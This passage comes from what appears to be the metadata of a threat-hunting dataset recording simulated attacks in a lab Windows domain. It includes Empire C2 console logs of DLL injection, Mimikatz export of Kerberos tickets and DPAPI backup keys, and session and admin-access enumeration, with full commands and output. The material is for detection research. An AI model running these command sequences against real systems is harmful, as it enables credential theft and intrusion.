712ETU3B\n(Empire: 712ETU3B) >\n(Empire: 712ETU3B) > ps\n[*] Tasked 712ETU3B to run TASK_SHELL\n[*] Agent 712ETU3B tasked with task ID 1\n(Empire: 712ETU3B) > upload /tmp/launcher.dll\n[*] Tasked agent to upload launcher.dll, 155 KB\n[*] Tasked 712ETU3B to run TASK_UPLOAD\n[*] Agent 712ETU3B tasked with task ID 2\n(Empire: 712ETU3B) >\nProcessName                                                      PID Arch UserName                     MemUsage \n-----------                                                      --- ---- --------                     -------- \nIdle                                                               0 x64  N/A                          0.01 MB  \nSystem                                                             4 x64  N/A                          0.14 MB  \nRegistry                                                          88 x64  NT AUTHORITY\\SYSTEM          59.03 MB \nsvchost                                                          396 x64  NT AUTHORITY\\SYSTEM          8.43 MB  \nsmss                                                             408 x64  NT AUTHORITY\\SYSTEM          1.10 MB  \nLogonUI                                                          456 x64  NT AUTHORITY\\SYSTEM          47.74 MB \ncsrss                                                            524 x64  NT AUTHORITY\\SYSTEM          4.66 MB  \nwininit                                                          596 x64  NT AUTHORITY\\SYSTEM          6.04 MB  \ncsrss                                                            604 x64  NT AUTHORITY\\SYSTEM          3.95 MB  \nwinlogon                                                         664 x64  NT AUTHORITY\\SYSTEM          9.32 MB  \ncsrss                                                            716 x64  NT AUTHORITY\\SYSTEM          5.08 MB  \nservices                                                         732 x64  NT AUTHORITY\\SYSTEM          12.67 MB \nlsass                                                            740 x64  NT AUTHORITY\\SYSTEM          21.21 MB \ndwm                                                              796 x64  Window Manager\\DWM-1         36.96 MB \nctfmon                                                           808 x64  MORDOR\\pgustavo              13.93 MB \nsvchost                                                          856 x64  NT AUTHORITY\\SYSTEM          3.58 MB  \nfontdrvhost                                                      880 x64  Font Driver Host\\UMFD-1      2.18 MB  \nfontdrvhost                                                      884 x64  Font Driver Host\\UMFD-0      2.22 MB  \nsvchost                                                          920 x64  NT AUTHORITY\\SYSTEM          28.34 MB \nsvchost                                                          996 x64  NT AUTHORITY\\NETWORK SERVICE 14.50 MB \nsvchost                                                         1056 x64  NT AUTHORITY\\NETWORK SERVICE 67.65 MB \nsvchost                                                         1096 x64  NT AUTHORITY\\SYSTEM          6.86 MB  \nsvchost                                                         1120 x64  NT AUTHORITY\\SYSTEM          9.29 MB  \nsvchost                                                         1164 x64  NT AUTHORITY\\LOCAL SERVICE   6.02 MB  \nsvchost                                                         1176 x64  NT AUTHORITY\\LOCAL SERVICE   6.60 MB  \nsvchost                                                         1184 x64  NT AUTHORITY\\LOCAL SERVICE   11.45 MB \nsvchost                                                         1192 x64  NT AUTHORITY\\LOCAL SERVICE   5.42 MB  \nbrowser_broker                                                  1220 x64  MORDOR\\pgustavo              10.18 MB \nbackgroundTaskHost                                              1296 x64  MORDOR\\pgustavo              16.88 MB \nsvchost                                                         1304 x64  NT AUTHORITY\\SYSTEM          14.52 MB \nsvchost                                                         1356 x64  NT AUTHORITY\\LOCAL SERVICE   6.06 MB  \nsvchost                                                         1392 x64  NT AUTHORITY\\LOCAL SERVICE   27.38 MB \nsvchost                                                         1408 x64  NT AUTHORITY\\NETWORK SERVICE 7.54 MB  \nsvchost                                                         1436 x64  NT AUTHORITY\\SYSTEM          10.04 MB \nsvchost                                                         1444 x64  NT AUTHORITY\\SYSTEM          5.67 MB  \nSecurityHealthSystray                                           1468 x64  MORDOR\\pgustavo              11.66 MB \nsvchost                                                         1488 x64  NT AUTHORITY\\SYSTEM          5.47 MB  \nsvchost                                                         1496 x64  NT AUTHORITY\\SYSTEM          6.18 MB  \nsvchost                                                         1504 x64  NT AUTHORITY\\SYSTEM          6.77 MB  \nsvchost                                                         1532 x64  NT AUTHORITY\\LOCAL SERVICE   7.59 MB  \nsvchost                                                         1544 x64  NT AUTHORITY\\LOCAL SERVICE   5.32 MB  \nsvchost                                                         1740 x64  NT AUTHORITY\\NETWORK SERVICE 11.28 MB \nsvchost                                                         1764 x64  NT AUTHORITY\\LOCAL SERVICE   16.14 MB \nsvchost                                                         1868 x64  NT AUTHORITY\\LOCAL SERVICE   17.68 MB \nVSSVC                                                           1936 x64  NT AUTHORITY\\SYSTEM          7.02 MB  \nsvchost                                                         1960 x64  NT AUTHORITY\\SYSTEM          13.24 MB \nsvchost                                                         1968 x64  NT AUTHORITY\\LOCAL SERVICE   7.03 MB  \nsvchost                                                         1980 x64  NT AUTHORITY\\SYSTEM          47.10 MB \nsvchost                                                         1992 x64  NT AUTHORITY\\SYSTEM          5.35 MB  \nRuntimeBroker                                                   2068 x64  MORDOR\\pgustavo              21.71 MB \nMemory Compression                                              2104 x64  NT AUTHORITY\\SYSTEM          98.54 MB \nsvchost                                                         2188 x64  NT AUTHORITY\\SYSTEM          9.24 MB  \nbackgroundTaskHost                                              2196 x64  MORDOR\\pgustavo              38.76 MB \nsvchost                                                         2208 x64  NT AUTHORITY\\SYSTEM          7.00 MB  \nSgrmBroker                                                      2252 x64  NT AUTHORITY\\SYSTEM          5.88 MB  \nspoolsv                                                         2260 x64  NT AUTHORITY\\SYSTEM          14.19 MB \nsvchost                                                         2264 x64  NT AUTHORITY\\SYSTEM          9.81 MB  \nsvchost                                                         2296 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nsvchost                                                         2316 x64  NT AUTHORITY\\LOCAL SERVICE   7.14 MB  \nsvchost                                                         2372 x64  NT AUTHORITY\\SYSTEM          6.17 MB  \nsvchost                                                         2484 x64  NT AUTHORITY\\LOCAL SERVICE   6.16 MB  \nRuntimeBroker                                                   2540 x64  MORDOR\\pgustavo              28.75 MB \nsvchost                                                         2548 x64  NT AUTHORITY\\LOCAL SERVICE   6.89 MB  \nsmartscreen                                                     2568 x64  MORDOR\\pgustavo              27.85 MB \nsvchost                                                         2592 x64  NT AUTHORITY\\SYSTEM          19.99 MB \nsvchost                                                         2608 x64  NT AUTHORITY\\NETWORK SERVICE 8.35 MB  \nsvchost                                                         2644 x64  NT AUTHORITY\\SYSTEM          10.73 MB \nsvchost                                                         2676 x64  NT AUTHORITY\\LOCAL SERVICE   13.55 MB \nWaSecAgentProv                                                  2760 x64  NT AUTHORITY\\SYSTEM          5.63 MB  \nsvchost                                                         2776 x64  NT AUTHORITY\\SYSTEM          9.90 MB  \nsvchost                                                         2812 x64  NT AUTHORITY\\LOCAL SERVICE   5.57 MB  \nsvchost                                                         2820 x64  NT AUTHORITY\\SYSTEM          11.99 MB \nsvchost                                                         2828 x64  NT AUTHORITY\\LOCAL SERVICE   8.51 MB  \nsvchost                                                         2920 x64  NT AUTHORITY\\SYSTEM          11.50 MB \nsihost                                                          3104 x64  MORDOR\\pgustavo              27.69 MB \nsvchost                                                         3256 x64  NT AUTHORITY\\NETWORK SERVICE 12.81 MB \nsvchost                                                         3268 x64  NT AUTHORITY\\SYSTEM          24.27 MB \nsvchost                                                         3284 x64  NT AUTHORITY\\LOCAL SERVICE   33.89 MB \nsvchost                                                         3344 x64  NT AUTHORITY\\SYSTEM          5.10 MB  \nsvchost                                                         3372 x64  NT AUTHORITY\\LOCAL SERVICE   6.68 MB  \nShellExperienceHost                                             3384 x64  MORDOR\\pgustavo              50.26 MB \nsvchost                                                         3440 x64  NT AUTHORITY\\SYSTEM          15.84 MB \nWindowsAzureGuestAgent                                          3468 x64  NT AUTHORITY\\SYSTEM          59.33 MB \nWaAppAgent                                                      3476 x64  NT AUTHORITY\\SYSTEM          73.09 MB \nWindowsAzureNetAgent                                            3544 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nsvchost                                                         3564 x64  NT AUTHORITY\\LOCAL SERVICE   4.78 MB  \nNetworkWatcherAgent                                             3580 x64  NT AUTHORITY\\SYSTEM          12.99 MB \nsvchost                                                         3624 x64  NT AUTHORITY\\SYSTEM          8.15 MB  \nsvchost                                                         3648 x64  NT AUTHORITY\\SYSTEM          12.23 MB \nsvchost                                                         4240 x64  NT AUTHORITY\\SYSTEM          19.69 MB \nWUDFHost                                                        4276 x64  NT AUTHORITY\\LOCAL SERVICE   29.04 MB \nSearchIndexer                                                   4296 x64  NT AUTHORITY\\SYSTEM          33.70 MB \nconhost                                                         4304 x64  MORDOR\\pgustavo              15.58 MB \ntaskhostw                                                       4432 x64  NT AUTHORITY\\SYSTEM          36.85 MB \nsvchost                                                         4440 x64  NT AUTHORITY\\SYSTEM          9.48 MB  \nsvchost                                                         4616 x64  MORDOR\\pgustavo              16.36 MB \nsvchost                                                         4628 x64  NT AUTHORITY\\SYSTEM          8.93 MB  \nsvchost                                                         4640 x64  NT AUTHORITY\\SYSTEM          19.45 MB \nsvchost                                                         4796 x64  NT AUTHORITY\\LOCAL SERVICE   9.97 MB  \nconhost                                                         4856 x64  MORDOR\\pgustavo              15.93 MB \nsvchost                                                         4900 x64  NT AUTHORITY\\SYSTEM          7.45 MB  \nStartMenuExperienceHost                                         5024 x64  MORDOR\\pgustavo              61.98 MB \nsvchost                                                         5064 x64  NT AUTHORITY\\LOCAL SERVICE   9.70 MB  \nsvchost                                                         5080 x64  NT AUTHORITY\\SYSTEM          7.20 MB  \nsvchost                                                         5148 x64  NT AUTHORITY\\NETWORK SERVICE 18.23 MB \nsvchost                                                         5464 x64  MORDOR\\pgustavo              21.27 MB \nMicrosoftEdge                                                   5516 x64  MORDOR\\pgustavo              65.12 MB \nsvchost                                                         5524 x64  NT AUTHORITY\\LOCAL SERVICE   6.69 MB  \nsvchost                                                         5548 x64  NT AUTHORITY\\SYSTEM          18.43 MB \nRuntimeBroker                                                   5596 x64  MORDOR\\pgustavo              48.75 MB \nsvchost                                                         5640 x64  NT AUTHORITY\\SYSTEM          6.71 MB  \nsvchost                                                         5648 x64  NT AUTHORITY\\SYSTEM          8.14 MB  \nsvchost                                                         5704 x64  NT AUTHORITY\\SYSTEM          5.90 MB  \nsvchost                                                         5812 x64  NT AUTHORITY\\LOCAL SERVICE   6.93 MB  \ndllhost                                                         5976 x64  MORDOR\\pgustavo              15.26 MB \nsvchost                                                         6008 x64  NT AUTHORITY\\LOCAL SERVICE   8.91 MB  \nsvchost                                                         6036 x64  NT AUTHORITY\\LOCAL SERVICE   6.32 MB  \nsvchost                                                         6072 x64  MORDOR\\pgustavo              33.20 MB \nRuntimeBroker                                                   6152 x64  MORDOR\\pgustavo              24.96 MB \nTrustedInstaller                                                6280 x64  NT AUTHORITY\\SYSTEM          6.59 MB  \nsvchost                                                         6368 x64  NT AUTHORITY\\SYSTEM          9.77 MB  \nsvchost                                                         6488 x64  NT AUTHORITY\\SYSTEM          11.64 MB \nnotepad                                                         6536 x64  MORDOR\\pgustavo              15.43 MB \nSecurityHealthHost                                              6540 x64  MORDOR\\pgustavo              15.52 MB \nfontdrvhost                                                     6652 x64  Font Driver Host\\UMFD-3      6.01 MB  \nWindowsInternal.ComposableShell.Experiences.TextInput.InputApp  6680 x64  MORDOR\\pgustavo              34.32 MB \nMicrosoftEdgeCP                                                 6744 x64  MORDOR\\pgustavo              51.89 MB \nWmiPrvSE                                                        6904 x64  NT AUTHORITY\\NETWORK SERVICE 10.39 MB \nMicrosoft.Photos                                                7044 x64  MORDOR\\pgustavo              34.66 MB \ndllhost                                                         7084 x64  MORDOR\\pgustavo              7.86 MB  \nconhost                                                         7136 x64  NT AUTHORITY\\SYSTEM          5.40 MB  \ndwm                                                             7348 x64  Window Manager\\DWM-3         83.22 MB \nRuntimeBroker                                                   7468 x64  MORDOR\\pgustavo              24.92 MB \nWindows.WARP.JITService                                         7620 x64  NT AUTHORITY\\LOCAL SERVICE   5.05 MB  \nwinlogon                                                        8012 x64  NT AUTHORITY\\SYSTEM          8.22 MB  \nMsMpEng                                                         8272 x64  NT AUTHORITY\\SYSTEM          102.83 MB\nsvchost                                                         8328 x64  NT AUTHORITY\\LOCAL SERVICE   8.31 MB  \nRuntimeBroker                                                   8392 x64  MORDOR\\pgustavo              20.96 MB \nsvchost                                                         8408 x64  MORDOR\\pgustavo              30.12 MB \nWindows.WARP.JITService                                         8416 x64  NT AUTHORITY\\LOCAL SERVICE   5.21 MB  \nsvchost                                                         8480 x64  NT AUTHORITY\\SYSTEM          5.68 MB  \nApplicationFrameHost                                            8484 x64  MORDOR\\pgustavo              28.34 MB \nexplorer                                                        8532 x64  MORDOR\\pgustavo              117.59 MB\nWUDFHost                                                        8600 x64  NT AUTHORITY\\LOCAL SERVICE   4.83 MB  \npowershell                                                      8648 x64  MORDOR\\pgustavo              73.75 MB \nMicrosoftEdgeSH                                                 8880 x64  MORDOR\\pgustavo              15.34 MB \npowershell                                                      9076 x64  MORDOR\\pgustavo              121.03 MB\nrdpclip                                                         9128 x64  MORDOR\\pgustavo              10.55 MB \ntaskhostw                                                       9236 x64  MORDOR\\pgustavo              16.99 MB \nSearchUI                                                        9328 x64  MORDOR\\pgustavo              211.37 MB\nSysmon                                                          9368 x64  NT AUTHORITY\\SYSTEM          17.81 MB \nsvchost                                                         9560 x64  NT AUTHORITY\\SYSTEM          10.84 MB \nSecurityHealthService                                           9640 x64  NT AUTHORITY\\SYSTEM          16.16 MB \nRuntimeBroker                                                   9768 x64  MORDOR\\pgustavo              30.12 MB \nsvchost                                                         9860 x64  NT AUTHORITY\\SYSTEM          5.57 MB  \nunsecapp                                                        9996 x64  NT AUTHORITY\\SYSTEM          6.41 MB  \nTiWorker                                                       10084 x64  NT AUTHORITY\\SYSTEM          27.34 MB \nsvchost                                                        10164 x64  NT AUTHORITY\\SYSTEM          10.19 MB\n\n(Empire: 712ETU3B) > usemodule code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > set Dll launcher.dll \n(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 6536\n(Empire: powershell/code_execution/invoke_dllinjection) > info\n\n              Name: Invoke-DllInjection\n            Module: powershell/code_execution/invoke_dllinjection\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n\nDescription:\n  Uses PowerSploit's Invoke-DLLInjection to inject  a Dll into\n  the process ID of your choosing.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Co\n  deExecution/Invoke-DllInjection.ps1\n\nOptions:\n\n  Name      Required    Value                     Description\n  ----      --------    -------                   -----------\n  Agent     True        712ETU3B                  Agent to run module on.                 \n  ProcessID True        6536                      Process ID of the process you want to   \n                                                  inject a Dll into.                      \n  Dll       True        launcher.dll              Name of the dll to inject. This can be  \n                                                  an absolute or relative path.           \n\n(Empire: powershell/code_execution/invoke_dllinjection) > execute\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 6\n[*] Tasked agent 712ETU3B to run module powershell/code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > \nSystem.Diagnostics.ProcessModule (launcher.dll)\n\n(Empire: powershell/code_execution/invoke_dllinjection) >"}, "references": ["https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"]}, "SDWIN-190518224039": {"title": "Empire Find Local Admin Access", "id": "SDWIN-190518224039", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2019/05/18", "platform": ["Windows"], "type": "atomic", "tags": ["RPC OpenSCManager", "SMB Svcctl"], "description": "This dataset represents adversaries using the OpenSCManagerW Win32API call to establish a handle to the remote host and verify if the current user context has local administrator acess to the target.", "attack_mappings": [{"technique": "T1069", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_find_localadmin_smb_svcctl_OpenSCManager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "find_localadmin_access", "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: GCSKD17Z) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nGCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1112   5/0.0    2020-09-22 06:15:19  http            \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) > usemodule situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute\n[*] Tasked GCSKD17Z to run TASK_CMD_JOB\n[*] Agent GCSKD17Z tasked with task ID 8\n[*] Tasked agent GCSKD17Z to run module powershell/situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > \nJob started: GL5DUX\n\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > back\n(Empire: GCSKD17Z) > \nWORKSTATION5.theshire.local\nWORKSTATION6.theshire.local\nMORDORDC.theshire.local\nWEC.theshire.local\n\nFind-LocalAdminAccess completed!\n\n(Empire: GCSKD17Z) >"}, "references": null}, "SDWIN-190518230752": {"title": "Empire Mimikatz Extract Kerberos Keys", "id": "SDWIN-190518230752", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2019/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Kerberos Tickets"], "description": "This dataset represents adversaries extracting kerberos tickets from memory.", "attack_mappings": [{"technique": "T1003", "sub-technique": "004", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_extract_keys.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "extract_tickets", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 07:35:29  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > info\n\n              Name: Invoke-Mimikatz extract kerberos tickets.\n            Module: powershell/credentials/mimikatz/extract_tickets\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  kerberos tickets from memory in base64-encoded form.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        WE8XYD3K                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/extract_tickets) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 1\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > \nJob started: PY68ZG\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # standard::base64\nisBase64InterceptInput  is false\nisBase64InterceptOutput is false\n\nmimikatz(powershell) # kerberos::list /export\n\n[00000000] - 0x00000012 - aes256_hmac      \n  Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM\n  Server Name       : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL\n  Client Name       : pgustavo @ THESHIRE.LOCAL\n  Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; \n  * Saved to file     : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi\n\n(Empire: powershell/credentials/mimikatz/extract_tickets) >"}, "references": null}, "SDWIN-190518235535": {"title": "Empire Mimikatz Backup Keys", "id": "SDWIN-190518235535", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["DPAPI", "DPAPI Domain Backup key", "RPC LSARPC"], "description": "This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.", "attack_mappings": [{"technique": "T1003", "sub-technique": null, "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Domain DPAPI Backup Key Extraction", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "mimikatz_lsadump_backupkeys", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nALYH6ZB2 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         4380   5/0.0    2020-10-22 18:24:28  http            \n\n(Empire: agents) > interact ALYH6ZB2\n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/\ncache*           command          dcsync_hashdump  golden_ticket    logonpasswords*  mimitokens*      purge            silver_ticket    \ncerts*           dcsync           extract_tickets  keys*            lsadump*         pth*             sam*             trust_keys*      \n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export\n(Empire: powershell/credentials/mimikatz/command) > execute\n[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB\n[*] Agent ALYH6ZB2 tasked with task ID 1\n[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > \nJob started: 75WB4S\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > https://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export\n\nCurrent prefered key:       {a0feda20-878f-4e68-ba74-d4df8f0191ab}\n  * RSA key\n        |Provider name : Microsoft Strong Cryptographic Provider\n        |Unique name   : \n        |Implementation: CRYPT_IMPL_SOFTWARE ; \n        Algorithm      : CALG_RSA_KEYX\n        Key size       : 2048 (0x00000800)\n        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )\n        Exportable key : YES\n        Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'\n        PFX container  : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'\n        Export         : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'\n\nCompatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}\n  * Legacy key\ndaef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d\n4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2\n71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e\n444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab\n9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476\n77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c\n45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603\n834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc\n\n        Export         : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'\n(Empire: powershell/credentials/mimikatz/command) >"}, "references": null}, "SDWIN-190519005224": {"title": "Empire Remote Get Session", "id": "SDWIN-190519005224", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/19", "modification_date": "2019/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC NetSessEnum", "SMB Srvsvc"], "description": "This dataset represents adversaries leveraging RPC SRVSVC and the method NetSessEnum over SMB to query remote hosts for active sessions", "attack_mappings": [{"technique": "T1049", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "get_session", "script": "https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/situational_awareness/network/powerview.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nWE8XYD3K ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5972   5/0.0    2020-09-22 07:44:38  http            \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > info\n\n              Name: Get-NetSession\n            Module: powershell/situational_awareness/network/powerview/get_session\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Execute the NetSessionEnum Win32API call to query a given\n  host for active sessions on the host. Part of PowerView.\n\nComments:\n  https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco\n  n/\n\nOptions:\n\n  Name         Required    Value                     Description\n  ----         --------    -------                   -----------\n  Agent        True        WE8XYD3K                  Agent to run module on.                 \n  ComputerName False       localhost                 The hostname or IP to query for local   \n                                                    group users.                            \n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName MORDORDC\n(Empire: powershell/situational_awareness/network/powerview/get_session) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 2\n[*] Tasked agent WE8XYD3K to run module powershell/situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > \nJob started: DV248X\n\nCName         UserName Time IdleTime ComputerName\n-----         -------- ---- -------- ------------\n\\\\172.18.39.5 pgustavo    0        0 MORDORDC    \n\nGet-NetSession completed!\n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > "}, "references": null}, "SDWIN-190625103712": {"title": "Empire Mimikatz SAM Extract Hashes", "id": "SDWIN-190625103712", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/06/25", "modification_date": "2019/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["Calculating SysKey", "SAM Read", "SAM Handle Request"], "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_sam_access.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "mimikatz_sam", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName     La Internal IP     